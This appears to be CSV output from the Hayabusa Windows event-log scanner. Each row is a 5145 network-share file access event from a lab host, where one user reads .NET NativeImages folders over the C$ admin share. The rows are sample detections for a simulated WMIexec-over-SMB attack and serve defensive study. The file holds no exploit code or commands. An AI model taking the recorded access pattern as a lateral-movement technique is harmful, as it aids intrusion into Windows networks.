2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
